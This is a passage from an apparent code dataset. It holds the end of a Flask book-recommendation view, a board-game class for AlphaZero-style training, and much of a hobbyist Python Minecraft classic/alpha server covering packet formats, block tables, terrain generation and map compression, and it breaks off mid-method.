is actually the 
first recommendation because it's the most similar\n seed_book = get_metadata(recs, books_df, 1)[0]\n rec_books = get_metadata(recs[1:], books_df, 10)[:4]\n for rec in rec_books:\n print(rec)\n return render_template(\"output.html\", seed_book = seed_book, rec_books = rec_books)\n\n@app.route('/aboutme')\ndef aboutme():\n return render_template(\"aboutme.html\")\n\n@app.route('/aboutotak')\ndef aboutotak():\n return render_template(\"aboutotak.html\")\n","sub_path":"flask/flaskapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"71653155","text":"import sys\nsys.path.append('..')\nfrom Game import Game\nfrom .Boese2Logic import Board\nimport numpy as np\n\nclass Boese2Game(Game):\n\n def __init__(self, n):\n self.n = n\n self.Es = {}\n \n def getInitBoard(self):\n b = Board(self.n)\n self.Es = {}\n self.Es[self.stringRepresentation(np.array(b.pieces))] = 0\n return np.array(b.pieces)\n\n def getBoardSize(self):\n # (a,b) tuple\n return (self.n, self.n)\n \n def getActionSize(self):\n # return number of actions\n return self.n*self.n\n \n def getNextState(self, board, player, action):\n b = Board(self.n, True)\n b.pieces = np.copy(board)\n move = (int(action/self.n), action%self.n)\n result = b.execute_move(move, player)\n self.Es[self.stringRepresentation(np.array(b.pieces))] = result\n # if self.move == 3:\n # b.seccond_move(-player)\n # self.move += 1\n # return (b.pieces, player)\n return (b.pieces, -player)\n \n def getValidMoves(self, board, player):\n # return a fixed size binary vector\n valids = [0]*self.getActionSize()\n b = Board(self.n, True)\n b.pieces = np.copy(board)\n legalMoves = b.get_legal_moves()\n for x, y in legalMoves:\n valids[self.n*x+y]=1\n return np.array(valids)\n \n #White Won: 1\n #Black Won: -1\n #Draw: 1e-4\n #No Result: 0\n def getGameEnded(self, board, player):\n s = self.stringRepresentation(board)\n r = 0\n try:\n r = self.Es[s]\n except:\n r = self.Es[self.stringRepresentation(self.getCanonicalForm(board, -player))]\n if r*r == 1:\n r = -r\n self.Es[s] = r\n if r*r == 1:\n #print(\"Moves played: \" + str(self.move))\n return player*r\n return r\n \n def getCanonicalForm(self, board, player):\n # return state if player==1, else return -state if player==-1\n if player == 1:\n return board\n with np.nditer(board, op_flags=['readwrite']) as it:\n for x in it:\n if x*x == 1:\n x[...] 
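# Illustrative sketch (not from the original file): getSymmetries just below
# multiplies each training sample by eight — four rotations times an optional
# mirror — because the square board is invariant under those transforms.
import numpy as np

def eight_symmetries(board):
    out = []
    for k in range(4):
        r = np.rot90(board, k)
        out.append(r)
        out.append(np.fliplr(r))
    return out

b = np.arange(9).reshape(3, 3)
syms = eight_symmetries(b)
assert len(syms) == 8 and any(np.array_equal(s, b) for s in syms)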
= -x\n        return board\n    \n    def getSymmetries(self, board, pi):\n        # mirror, rotational\n        pi_board = np.reshape(pi, (self.n, self.n))\n        l = []\n\n        for i in range(1, 5):\n            for j in [True, False]:\n                newB = np.rot90(board, i)\n                newPi = np.rot90(pi_board, i)\n                if j:\n                    newB = np.fliplr(newB)\n                    newPi = np.fliplr(newPi)\n                l += [(newB, list(newPi.ravel()))]\n        return l\n    \n    def stringRepresentation(self, board):\n        return board.tostring()","sub_path":"boese2/Boese2Game.py","file_name":"Boese2Game.py","file_ext":"py","file_size_in_byte":2773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"641542713","text":"#!/usr/bin/python3\n\n#from __future__ import gzip\nimport socket\nimport urllib.request\nimport struct\nimport time\nimport math\nimport gzip\nimport zlib\nimport random\nimport os.path\nimport hashlib\nimport threading\n#import re\n\nrandom.seed(None)\n\ndebug = 0\nif debug: print (\"Debug mode is ON, you will be thoroughly spammed.\")\n\n### CONSTANTS ###\n\n#P = {} ## Classic Packet IDs\nPC_IDENT = 0x00\nPC_PING = 0x01\nPC_LEVEL_INIT = 0x02\nPC_LEVEL_CHUNK = 0x03\nPC_LEVEL_FINALIZE = 0x04\nPC_SET_BLOCK_CLIENT = 0x05\nPC_SET_BLOCK_SERVER = 0x06\nPC_SPAWN_PLAYER = 0x07\nPC_PLAYER_TELEPORT = 0x08\nPC_PLAYER_MOVE = 0x09\nPC_PLAYER_POSITION = 0x0a\nPC_PLAYER_ORIENTATION = 0x0b\nPC_DESPAWN_PLAYER = 0x0c\nPC_MESSAGE = 0x0d\nPC_DISCONNECT = 0x0e\nPC_PLAYER_TYPE = 0x0f\n\nPACKETS={ ## Classic Packet Formats\nPC_IDENT : \"BSSB\",\nPC_PING : \"\",\nPC_LEVEL_INIT : \"\",\nPC_LEVEL_CHUNK : \"HAB\",\nPC_LEVEL_FINALIZE : \"HHH\",\nPC_SET_BLOCK_CLIENT : \"HHHBB\",\nPC_SET_BLOCK_SERVER : \"HHHB\",\nPC_SPAWN_PLAYER : \"BSHHHBB\",\nPC_PLAYER_TELEPORT : \"BHHHBB\", #B ???\nPC_PLAYER_MOVE : \"BbbbBB\",\nPC_PLAYER_POSITION : \"Bbbb\",\nPC_PLAYER_ORIENTATION : \"BBB\",\nPC_DESPAWN_PLAYER : \"B\",\nPC_MESSAGE : \"BS\",\nPC_DISCONNECT : \"S\"\n}\n\nfor packet_id in PACKETS:\n    PACKETS[packet_id] = PACKETS[packet_id].replace(\"S\", \"64s\").replace(\"A\", \"1024s\")\n\n## Alpha Packet IDs\nPA_KEEPALIVE = 0x00\nPA_IDENT = 0x01\nPA_HANDSHAKE = 0x02\nPA_CHAT_MESSAGE = 0x03\nPA_TIME_UPDATE = 0x04\nPA_ENTITY_EQUIPMENT = 0x05\nPA_SPAWN_POSITION = 0x06\nPA_USE_ENTITY = 0x07\nPA_UPDATE_HEALTH = 0x08\nPA_RESPAWN = 0x09\nPA_PLAYER = 0x0A\nPA_PLAYER_POSITION = 0x0B\nPA_PLAYER_LOOK = 0x0C\nPA_PLAYER_POSITION_AND_LOOK = 0x0D\nPA_PLAYER_DIGGING = 0x0E\nPA_PLAYER_BLOCK_PLACEMENT = 0x0F\nPA_HOLDING_CHANGE = 0x10\n## ??? 0x11\nPA_ANIMATION = 0x12\n## ??? 0x13\nPA_NAMED_ENTITY_SPAWN = 0x14\nPA_PICKUP_SPAWN = 0x15\nPA_COLLECT_ITEM = 0x16\nPA_ADD_OBJECT_OR_VEHICLE = 0x17\nPA_MOB_SPAWN = 0x18\n## ??? 0x19 to 0x1B\nPA_ENTITY_VELOCITY = 0x1C\nPA_DESTROY_ENTITY = 0x1D\nPA_ENTITY = 0x1E\nPA_ENTITY_RELATIVE_MOVE = 0x1F\nPA_ENTITY_LOOK = 0x20\nPA_ENTITY_LOOK_AND_RELATIVE_MOVE = 0x21\nPA_ENTITY_TELEPORT = 0x22\n## ??? 0x23 to 0x25\nPA_ENTITY_STATUS = 0x26\nPA_ATTACH_ENTITY = 0x27\n## ??? 0x28 to 0x31\nPA_PRE_CHUNK = 0x32\nPA_MAP_CHUNK = 0x33\nPA_MULTI_BLOCK_CHANGE = 0x34\nPA_BLOCK_CHANGE = 0x35\n## ??? 0x36 to 0x3B\nPA_EXPLOSION = 0x3C\n## ??? 0x3D to 0x63\nPA_OPEN_WINDOW = 0x64\nPA_WINDOW_CLOSE = 0x65\nPA_WINDOW_CLICK = 0x66\nPA_SET_SLOT = 0x67 # v8\nPA_WINDOW_ITEMS = 0x68 # v8\nPA_UNKNOWN_69 = 0x69\nPA_UNKNOWN_6A = 0x6A\n## ??? 0x6B to 0x81\nPA_UPDATE_SIGN = 0x82\n## ??? 
0x83 to 0xFE\nPA_DISCONNECT_OR_KICK = 0xFF\n\nA_PACKETS={ ## Alpha Packet Formats\nPA_KEEPALIVE : \"\",\nPA_IDENT : \"iSSqB\",\nPA_HANDSHAKE : \"S\",\nPA_CHAT_MESSAGE : \"S\",\nPA_TIME_UPDATE : \"q\",\nPA_ENTITY_EQUIPMENT : \"ihh\", ## Tricky to parse # Changed in v8\nPA_SPAWN_POSITION : \"iii\",\nPA_USE_ENTITY : \"ii?\",\nPA_UPDATE_HEALTH : \"h\",\nPA_RESPAWN : \"\",\nPA_PLAYER : \"?\",\nPA_PLAYER_POSITION : \"dddd?\",\nPA_PLAYER_LOOK : \"ff?\",\nPA_PLAYER_POSITION_AND_LOOK : \"ddddff?\",\nPA_PLAYER_DIGGING : \"biBiB\",\nPA_PLAYER_BLOCK_PLACEMENT : \"iBiBT\",\nPA_HOLDING_CHANGE : \"h\",\nPA_ANIMATION : \"iB\",\nPA_NAMED_ENTITY_SPAWN : \"iSiiiBBh\",\nPA_PICKUP_SPAWN : \"ihBiiiBBB\",\nPA_COLLECT_ITEM : \"ii\",\nPA_ADD_OBJECT_OR_VEHICLE : \"iBiii\",\nPA_MOB_SPAWN : \"iBiiiBB\",\nPA_ENTITY_VELOCITY : \"ihhh\",\nPA_DESTROY_ENTITY : \"i\",\nPA_ENTITY : \"i\",\nPA_ENTITY_RELATIVE_MOVE : \"ibbb\",\nPA_ENTITY_LOOK : \"ibb\",\nPA_ENTITY_LOOK_AND_RELATIVE_MOVE : \"ibbbbb\",\nPA_ENTITY_TELEPORT : \"iiiiBB\",\nPA_ENTITY_STATUS : \"ib\",\nPA_ATTACH_ENTITY : \"ii\",\nPA_PRE_CHUNK : \"ii?\",\nPA_MAP_CHUNK : None, ## Tricky to parse\nPA_MULTI_BLOCK_CHANGE : None, ## Tricky to parse\nPA_BLOCK_CHANGE : \"ibibb\",\nPA_EXPLOSION : None, ## Tricky to parse\nPA_OPEN_WINDOW : \"BbSb\",\nPA_WINDOW_CLOSE : \"B\",\nPA_WINDOW_CLICK : \"BhBhT\", ## Tricky to parse\nPA_SET_SLOT : None, ## Tricky to parse\nPA_WINDOW_ITEMS : None, # v8\nPA_UNKNOWN_69 : \"bbh\", ## Unknown\nPA_UNKNOWN_6A : \"bhb\", ## Unknown\nPA_UPDATE_SIGN : \"ihis\",\nPA_DISCONNECT_OR_KICK : \"S\" # S not s!!!\n}\n#for packet_id in A_PACKETS:\n# if A_PACKETS[packet_id]!= None: A_PACKETS[packet_id] = A_PACKETS[packet_id].replace(\"S\", \"hS\")\n\nB = {} # This should be stored in a text file somewhere later.\nB['air'] = 0x00\nB['stone'] = 0x01\nB['grass'] = 0x02\nB['dirt'] = 0x03\nB['cobblestone'] = 0x04\nB['wood'] = 0x05\nB['sapling'] = 0x06\nB['adminium'] = 0x07\nB['bedrock'] = 0x07 ## SYNONYM\nB['water'] = 0x08\nB['stationarywater'] = 0x09\nB['lava'] = 0x0a\nB['stationarylava'] = 0x0b\nB['sand'] = 0x0c\nB['gravel'] = 0x0d\nB['goldore'] = 0x0e\nB['ironore'] = 0x0f\nB['coalore'] = 0x10\nB['log'] = 0x11\nB['leaves'] = 0x12\nB['sponge'] = 0x13\nB['glass'] = 0x14\nB['redcloth'] = 0x15\nB['orangecloth'] = 0x16\nB['yellowcloth'] = 0x17\nB['limecloth'] = 0x18\nB['greencloth'] = 0x19\nB['aquagreencloth'] = 0x1a\nB['cyancloth'] = 0x1b\nB['bluecloth'] = 0x1c\nB['purplecloth'] = 0x1d\nB['indigocloth'] = 0x1e\nB['violetcloth'] = 0x1f\nB['magentacloth'] = 0x20\nB['pinkcloth'] = 0x21\nB['blackcloth'] = 0x22\nB['greycloth'] = 0x23\nB['graycloth'] = 0x23 ## SYNONYM\nB['wool'] = 0x23 ## SYNONYM\nB['whitecloth'] = 0x24\nB['yellowflower'] = 0x25\nB['redrose'] = 0x26\nB['redflower'] = 0x26 ## SYNONYM\nB['brownmushroom'] = 0x27\nB['redmushroom'] = 0x28\nB['goldblock'] = 0x29\nB['ironblock'] = 0x2a\nB['doublestep'] = 0x2b\nB['doubleslab'] = 0x2b\nB['slab'] = 0x2c\nB['step'] = 0x2c ## SYNONYM\nB['brick'] = 0x2d\nB['tnt'] = 0x2e\nB['bookshelf'] = 0x2f\nB['mossstone'] = 0x30\nB['mossycobblestone'] = 0x30\nB['obsidian'] = 0x31\nB['torch'] = 0x32\nB['fire'] = 0x33\nB['mobspawner'] = 0x34\nB['woodenstairs'] = 0x35\nB['chest'] = 0x36\nB['redstonewire'] = 0x37\nB['diamondore'] = 0x38\nB['diamondblock'] = 0x39\nB['workbench'] = 0x3a\nB['crops'] = 0x3b\nB['wheat'] = 0x3b ## SYNONYM\nB['soil'] = 0x3c\nB['furnace'] = 0x3d\nB['burningfurnace'] = 0x3e\nB['signpost'] = 0x3f\nB['woodendoor'] = 0x40\nB['ladder'] = 0x41\nB['minecarttracks'] = 0x42\nB['cobblestonestairs'] = 
0x43\nB['wallsign'] = 0x44\nB['lever'] = 0x45\nB['stonepressureplate'] = 0x46\nB['irondoor'] = 0x47\nB['woodenpressureplate'] = 0x48\nB['redstoneore'] = 0x49\nB['glowingredstoneore'] = 0x4a\nB['redstonetorchoff'] = 0x4b\nB['redstonetorchon'] = 0x4c\nB['redstonetorch'] = 0x4c ## SYNONYM\nB['stonebutton'] = 0x4d\nB['button'] = 0x4d ## SYNONYM\nB['snow'] = 0x4e\nB['ice'] = 0x4f\nB['snowblock'] = 0x50\nB['cactus'] = 0x51\nB['clay'] = 0x52\nB['reed'] = 0x53\nB['reeds'] = 0x53 ## SYNONYM\nB['jukebox'] = 0x54\nB['fence'] = 0x55\nB['pumpkin'] = 0x56\nB['netherrack'] = 0x57\nB['soulsand'] = 0x58\nB['glowstone'] = 0x59\nB['portal'] = 0x5a\nB['jackolantern'] = 0x5b\n\n## Blocks valid in classic\nC_BLOCKS = list(range(B['air'],B['obsidian']+1))\n## Block conversions for non-classic blocks\nCONVERSIONS = {}\nCONVERSIONS['internal'] = {}\nCONVERSIONS['classic'] = {}\nCONVERSIONS['alpha'] = {}\nCONVERSIONS['internal']['classic'] = {\nB['torch'] : B['redmushroom'],\nB['fire'] : B['air'], ## unconvertable, unplacable\nB['woodenstairs'] : B['wood'],\nB['chest'] : B['wood'],\nB['redstonewire'] : B['redmushroom'],\nB['diamondore'] : B['goldore'],\nB['diamondblock'] : B['goldblock'],\nB['workbench'] : B['wood'],\nB['crops'] : B['sapling'],\nB['soil'] : B['dirt'],\nB['furnace'] : B['stone'],\nB['burningfurnace'] : B['stone'],\nB['signpost'] : B['brownmushroom'],\nB['woodendoor'] : B['glass'], #todo: glass and wood\nB['ladder'] : B['water'],\nB['minecarttracks'] : B['brownmushroom'],\nB['cobblestonestairs'] : B['cobblestone'],\nB['wallsign'] : B['brownmushroom'],\nB['lever'] : B['brownmushroom'],\nB['stonepressureplate'] : B['brownmushroom'],\nB['irondoor'] : B['glass'],\nB['woodenpressureplate'] : B['brownmushroom'],\nB['redstoneore'] : B['ironore'],\nB['glowingredstoneore'] : B['ironore'],\nB['redstonetorchoff'] : B['redmushroom'],\nB['redstonetorchon'] : B['redmushroom'],\nB['stonebutton'] : B['brownmushroom'],\nB['snow'] : B['grass'],\nB['ice'] : B['glass'],\nB['snowblock'] : B['whitecloth'],\nB['cactus'] : B['leaves'],\nB['clay'] : B['greycloth'],\nB['reed'] : B['sapling'],\nB['jukebox'] : B['wood'],\nB['fence'] : B['wood'],\nB['pumpkin'] : B['orangecloth'],\nB['netherrack'] : B['dirt'],\nB['soulsand'] : B['gravel'],\nB['glowstone'] : B['yellowcloth'],\nB['portal'] : B['indigocloth'],\nB['jackolantern'] : B['orangecloth']\n}\n\nCONVERSIONS['internal']['alpha'] ={\nB['redcloth'] : B['wool'],\nB['orangecloth'] : B['wool'],\nB['yellowcloth'] : B['wool'],\nB['limecloth'] : B['wool'],\nB['greencloth'] : B['wool'],\nB['aquagreencloth'] : B['wool'],\nB['cyancloth'] : B['wool'],\nB['bluecloth'] : B['wool'],\nB['purplecloth'] : B['wool'],\nB['indigocloth'] : B['wool'],\nB['violetcloth'] : B['wool'],\nB['magentacloth'] : B['wool'],\nB['pinkcloth'] : B['wool'],\nB['blackcloth'] : B['wool'],\nB['greycloth'] : B['wool'],\nB['whitecloth'] : B['wool']\n}\n\nCONVERSIONS['alpha']['internal'] ={\nB['wool'] : B['whitecloth']\n}\n\n## Blocks valid in Alpha\nA_BLOCKS = list(range(B['air'],B['glass']+1))\\\n + [B['wool']]\\\n + list(range(B['yellowflower'],B['jackolantern']+1))\n \n## \"Safe\" inventory for Alpha \nA_INVENTORY = list(range(B['air'],B['sapling']+1))\\\n + list(range(B['water'],B['glass']+1))\\\n + list(range(0x15, 0x19))\\\n + list(range(B['yellowflower'],B['torch']+1))\\\n + list(range(B['mobspawner'],B['workbench']+1))\\\n + list(range(B['soil'],B['jackolantern']+1))\n\n\ndef get_block_name(get_block_id):\n for block_name, block_id in B.items():\n if block_id == get_block_id:\n return block_name\n return None\n 
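# Illustrative sketch (not from the original file; 'convert' is an invented demo
# helper): Block.set() further down maps a block type between protocols by looking
# it up in the CONVERSIONS table above and falling back to the unchanged id when
# no entry exists — a plain dict lookup with a default.
def convert(block_type, conversions):
    try:
        return conversions[block_type]
    except KeyError:
        return block_type   # most blocks exist in both protocols unchanged

assert convert(B['snow'], CONVERSIONS['internal']['classic']) == B['grass']
assert convert(B['stone'], CONVERSIONS['internal']['classic']) == B['stone']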
\ndef get_block_conversions(block_id):\n    string = \", \"\n    for protocol_to_name, protocol_to in CONVERSIONS['internal'].items():\n        for block_from, block_to in protocol_to.items():\n            if block_from == block_id:\n                string+=\"{} in {}, \".format(get_block_name(block_to), protocol_to_name)\n    return string.rstrip(\", \")\n\nclass Item:\n    def __init__(self, type, amount=1, uses=0):\n        self.type = type\n        self.amount = amount\n        self.uses = uses\n    \n    def __str__(self):\n        return \"Item {} ({}); amount {}; uses {}\".format(self.type, get_block_name(self.type), self.amount, self.uses)\n    \n    def pack(self):\n        if self.type == None:\n            return struct.pack(\">h\", -1)\n        else:\n            return struct.pack(\">hBh\", self.type, self.amount, self.uses)\n\nclass Block:\n    def __init__(self):\n        self.alphatype = B['air']\n        self.classictype = B['air']\n        self.internaltype = B['air']\n        \n        self.changed_by = 0\n        self.changed_on = time.time()\n        self.metadata = 0\n        self.light = 15\n        self.sunlight = 15\n    \n    def __str__(self):\n        type = self.get(\"internal\")\n        return (\"Block type {} ({}{}); last changed on {} by {}\".format(type,get_block_name(type), get_block_conversions(type), self.changed_on,server.get_name_for_persistent_id(self.changed_by)))\n    \n    def get(self,protocol='internal'): ## Returns block type (converting to specified protocol)\n        ##if protocol != 'internal':\n        ##    try:\n        ##        return CONVERSIONS['internal'][protocol][self.type]\n        ##    except KeyError:\n        ##        return self.type\n        ##else:\n        ##    return self.type\n        if protocol == 'alpha':\n            return self.alphatype\n        elif protocol == 'classic':\n            return self.classictype\n        elif protocol == 'internal':\n            return self.internaltype\n    \n    def set(self,protocol,newtype): ## Sets block type (converting from specified protocol)\n        try:\n            self.alphatype = CONVERSIONS[protocol]['alpha'][newtype]\n        except KeyError:\n            self.alphatype = newtype\n        try:\n            self.classictype = CONVERSIONS[protocol]['classic'][newtype]\n        except KeyError:\n            self.classictype = newtype\n        try:\n            self.internaltype = CONVERSIONS[protocol]['internal'][newtype]\n        except KeyError:\n            self.internaltype = newtype\n    \n    def high(self):\n        ## pack metadata into the low nibble and light into the high nibble\n        return self.metadata | (self.light<<4)\n\n    def update(self, new_type, metadata=None, persistent_id=0):\n        self.set('internal', new_type)\n        if metadata != None:\n            self.metadata = metadata\n        else:\n            self.metadata = 0\n        self.changed_by = persistent_id\n        self.changed_on = time.time()\n    \n    def serialize(self):\n        return struct.pack('>BHf',self.get('internal'),self.changed_by,self.changed_on)\n    \n    def deserialize(self,serialized):\n        type,self.changed_by,self.changed_on = struct.unpack('>BHf',serialized)\n        self.set('internal',type)\n\nclass World:\n    def __init__(self, name=\"main\", map_x=64, map_y=127, map_z=64):\n        self.name = name\n        self.map_x = map_x\n        self.map_y = map_y\n        self.map_z = map_z\n        self.block_queue = []\n    \n    def serializeheader(self):\n        return struct.pack('>64sHHH',self.name.encode(),self.map_x,self.map_y,self.map_z)\n    \n    def deserializeheader(self,serialized):\n        self.name,self.map_x,self.map_y,self.map_z = struct.unpack('>64sHHH',serialized)\n        self.name = self.name.rstrip(b'\\x00').decode()\n    \n    def save(self,filename):\n        file = open(filename,'wb')\n        file.write(self.serializeheader())\n        for i in range(self.map_x):\n            for j in range(self.map_y):\n                for k in range(self.map_z):\n                    file.write(self.map[i][j][k].serialize())\n        file.close()\n    \n    def load(self,filename):\n        self.empty() ## Initialize map\n        file = open(filename,'rb')\n        self.deserializeheader(file.read(struct.calcsize('>64sHHH')))\n        for i in range(self.map_x):\n            for j in range(self.map_y):\n                for k 
in range(self.map_z):\n                    self.map[i][j][k].deserialize(file.read(struct.calcsize('>BHf')))\n        file.close()\n    \n    def empty(self):\n        ## indexed as map[x][y][z]\n        self.map = [[[Block() for z in range(self.map_z)] for y in range(self.map_y)] for x in range(self.map_x)]\n    \n    def create_flatgrass(self):\n        print (\"Generating flatgrass map...\")\n        self.empty()    \n        for x in range(self.map_x):\n            for y in range(self.map_y//2):\n                for z in range(self.map_z):\n                    if y == (self.map_y//2)-1:\n                        self.map[x][y][z].set('internal',B['grass'])\n                    elif y == 0:\n                        self.map[x][y][z].set('internal',B['bedrock'])\n                    else:\n                        self.map[x][y][z].set('internal',B['dirt'])\n        print (\"Done!\")\n    \n    def create_landscape(self): \n        ## http://www.dreamincode.net/forums/topic/66480-perlin-noise/ - Credit where credit is due :)\n        print (\"Creating empty map...\")\n        self.empty()\n        print (\"Generating \\\"realistic\\\" map...\")\n        for x in range(self.map_x): ## WATER!\n            for y in range(self.map_y//2):\n                for z in range(self.map_z):\n                    self.map[x][y][z].set('internal',B['water'])\n        random.seed() ## Seed random number gen so we don't always get the same map\n        mapsize = self.map_x*self.map_y*self.map_z\n        xoffset = random.randint(0-mapsize,mapsize) ## Random offsets so the noise field differs between maps\n        random.seed(xoffset)\n        zoffset = random.randint(0-mapsize,mapsize)\n        for i in range(self.map_x):\n            for j in range(self.map_z):\n                height = math.floor(self.perlin_noise(i/10+xoffset,j/10+zoffset)*(self.map_y//16)+self.map_y//2)\n                for k in range(height):\n                    if k == (height)-1:\n                        if k < self.map_y//2: ## Below water level\n                            self.map[i][k][j].set('internal',B['sand']) ## SAND!\n                        else:\n                            self.map[i][k][j].set('internal',B['grass']) ## GRASS!\n                            if random.randint(0,20)==10:\n                                self.place_tree(i,k+1,j) ## TREES!\n                    elif k > (height)-(height//6): ## DIRT!\n                        self.map[i][k][j].set('internal',B['dirt'])\n                    elif k == 0: ## BEDROCK!\n                        self.map[i][k][j].set('internal',B['bedrock'])\n                    else: \n                        if random.randint(0,20)!=10: ## STONE!\n                            self.map[i][k][j].set('internal',B['stone'])\n                        else: ## ORES!\n                            self.map[i][k][j].set('internal',random.choice([B['ironore'],B['goldore'],B['coalore'],B['diamondore'], B['redstoneore']]))\n        print (\"Done!\")\n    \n    def perlin_findnoise2(self,x,y): ## Used by create_landscape\n        n=math.floor(x)+math.floor(y)*57\n        n=(n<<13)^n\n        nn=(n*(n*n*60493+19990303)+1376312589)&0x7fffffff\n        return 1.0-(nn/1073741824.0)\n    \n    def perlin_interpolate1(self,a,b,x): ## Used by create_landscape\n        ft=x * 3.1415927\n        f=(1.0-math.cos(ft))* 0.5\n        return a*(1.0-f)+b*f\n    \n    def perlin_noise(self,x,y): ## Used by create_landscape\n        floorx=math.floor(x) ##This is kind of a cheap way to floor a double.\n        floory=math.floor(y)\n        s=self.perlin_findnoise2(floorx,floory)\n        t=self.perlin_findnoise2(floorx+1,floory)\n        u=self.perlin_findnoise2(floorx,floory+1) ##Get the surrounding pixels to calculate the transition.\n        v=self.perlin_findnoise2(floorx+1,floory+1)\n        int1=self.perlin_interpolate1(s,t,x-floorx) ##Interpolate between the values.\n        int2=self.perlin_interpolate1(u,v,x-floorx) ##Here we use x-floorx, to get the 1st dimension. 
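# Illustrative sketch (not from the original file): the cosine interpolation used
# above eases between a and b with weight (1 - cos(pi*x)) / 2, which is 0 at x=0,
# 1 at x=1, and has zero slope at both ends — smoother terrain than plain linear
# interpolation.
import math

def coserp(a, b, x):
    f = (1.0 - math.cos(x * math.pi)) * 0.5
    return a * (1.0 - f) + b * f

assert coserp(0.0, 10.0, 0.0) == 0.0
assert abs(coserp(0.0, 10.0, 0.5) - 5.0) < 1e-12
assert coserp(0.0, 10.0, 1.0) == 10.0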
Don't mind the x-floorx thingie, it's part of the cosine formula.\n return self.perlin_interpolate1(int1,int2,y-floory) ##Here we use y-floory, to get the 2nd dimension.\n \n def place_tree(self, x, y, z):\n if (y+4)<(self.map_y-1) and (x-1)>0 and (x+1)<(self.map_x-1) and (z-1)>0 and (z+1)<(self.map_z-1):\n self.map[x ][y ][z ].set('internal',B['log'])\n self.map[x ][y+1][z ].set('internal',B['log'])\n self.map[x ][y+2][z ].set('internal',B['log'])\n self.map[x ][y+3][z ].set('internal',B['log'])\n self.map[x ][y+4][z ].set('internal',B['leaves'])\n \n self.map[x-1][y+3][z ].set('internal',B['leaves'])\n self.map[x+1][y+3][z ].set('internal',B['leaves'])\n self.map[x ][y+3][z-1].set('internal',B['leaves'])\n self.map[x ][y+3][z+1].set('internal',B['leaves'])\n self.map[x-1][y+3][z-1].set('internal',B['leaves'])\n self.map[x+1][y+3][z+1].set('internal',B['leaves'])\n self.map[x-1][y+3][z+1].set('internal',B['leaves'])\n self.map[x+1][y+3][z-1].set('internal',B['leaves'])\n \n self.map[x-1][y+2][z ].set('internal',B['leaves'])\n self.map[x+1][y+2][z ].set('internal',B['leaves'])\n self.map[x ][y+2][z-1].set('internal',B['leaves'])\n self.map[x ][y+2][z+1].set('internal',B['leaves'])\n else:\n return False\n \n def place_fucked_tree(self, x, y, z): # This was the original tree code, didn't work right, but kept because it looks awesome\n if (y+6)<(self.map_y-1) and (x-1)>0 and (x+1)<(self.map_x-1) and (z-1)>0 and (z+1)<(self.map_z-1):\n for i in range(y,y+4+1):\n self.map[x][i][z].set('internal',B['log'])\n self.map[x][y+6][z].set('internal',B['leaves'])\n self.map[x][i+5][z].set('internal',B['leaves'])\n self.map[x-1][i+4][z].set('internal',B['leaves'])\n self.map[x+1][i+4][z].set('internal',B['leaves'])\n self.map[x][i+4][z-1].set('internal',B['leaves'])\n self.map[x][i+4][z+1].set('internal',B['leaves'])\n else:\n return False\n \n def spam_blocks(self):\n server.message_queue.append(\"§eServer: Refreshing map\")\n for x in range(self.map_x):\n for y in range(self.map_y):\n for z in range(self.map_z):\n self.block_queue.append((x, y, z))\n \n def set_block(self, x, y, z, set_block, player, persistent_id, metadata=None):\n if self.block_at(x, y, z) != None:\n try:\n self.map[x][y][z].update(set_block, metadata, persistent_id)\n self.block_queue.append((x, y, z))\n except IndexError:\n return None\n else:\n return self.map[x][y][z]\n else: return None\n \n def cuboid(self, x1, y1, z1, x2, y2, z2, set_block, player, persistent_id):\n if x2L\", self.count_blocks())\n \n for y in range(self.map_y):\n for z in range(self.map_z):\n for x in range(self.map_x):\n ##to_gzip+=struct.pack(\">B\", self.map[x][y][z].get(\"classic\"))\n to_gzip+=struct.pack(\">B\", self.map[x][y][z].classictype)\n \n #gzipped_map = gzip.compress(to_gzip) # only in dev :(\n ##f = gzip.GzipFile('map.gz', 'wb', compresslevel=1)\n f = gzip.GzipFile('map.gz', 'wb', compresslevel=9)\n f.write(to_gzip)\n f.close()\n return open('map.gz', 'rb')\n \n def zlib_map(self,x1,y1,z1,chunk_x,chunk_y,chunk_z): ## This is such a massive hack it shouldn't work, yet it does, beautifully\n map_to_zlib = b\"\"\n nib1_to_zlib = b\"\"\n nib2_to_zlib = b\"\"\n nib3_to_zlib = b\"\"\n nib1_last = None\n nib2_last = None\n nib3_last = None\n invalidate = True if x1 < 0 or y1 < 0 or z1 < 0 or x1 > server.main.map_x or y1 > server.main.map_y or z1 > server.main.map_z else False\n \n ibwater = struct.pack(\">B\",B[\"water\"])\n ibbrock = struct.pack(\">B\",B[\"bedrock\"])\n ibempty = struct.pack(\">B\",B[\"air\"])\n for x in range(x1,x1+chunk_x):\n for 
z in range(z1,z1+chunk_z):\n                for y in range(y1,y1+chunk_y):\n                    invalid = invalidate\n                    if invalid != True:\n                        try: self.map[x][y][z]\n                        except IndexError: ## This shouldn't happen, but will sometimes\n                            invalid = True\n                    if invalid:\n                        ## Out-of-map filler: air above half height, bedrock at the bottom layer, water in between\n                        map_to_zlib+=ibempty if y>chunk_y//2-1 else ibbrock if y<1 else ibwater\n                        continue\n                    map_to_zlib+=struct.pack(\">B\",self.map[x][y][z].get(\"alpha\"))\n                    nib1 = self.map[x][y][z].metadata\n                    nib2 = self.map[x][y][z].light\n                    nib3 = self.map[x][y][z].sunlight\n                    if nib1_last == None: \n                        nib1_last = nib1\n                        nib2_last = nib2\n                        nib3_last = nib3\n                    else:\n                        nib1_to_zlib += struct.pack(\">B\", nib1_last | (nib1<<4))\n                        nib2_to_zlib += struct.pack(\">B\", nib2_last | (nib2<<4))\n                        nib3_to_zlib += struct.pack(\">B\", nib3_last | (nib3<<4))\n                        nib1_last = None\n        return zlib.compress(map_to_zlib+nib1_to_zlib+nib2_to_zlib+nib3_to_zlib, 1)\n\n    \nclass Client:\n    \"\"\" A class defining a generic client connected to the server. \"\"\"\n    def __init__(self, conn, addr, first_byte):\n        self.name = \"Player\"\n        self.conn = conn\n        self.addr = addr\n        \n        self.pid = {'classic': 0, 'alpha':0}\n        # Rewrite this.\n        pids = {}\n        pids['classic'] = []\n        pids['alpha'] = []\n        for client in server.clients:\n            if client is not self:\n                pids['classic'].append(client.pid['classic'])\n                pids['alpha'].append(client.pid['alpha'])\n        for i, pid in enumerate(pids['classic']):\n            if i < pid:\n                self.pid['classic']=pid-1\n                break\n            else:\n                self.pid['classic']=pid+1\n        for i, pid in enumerate(pids['alpha']):\n            if i < pid:\n                self.pid['alpha']=pid-1\n                break\n            else:\n                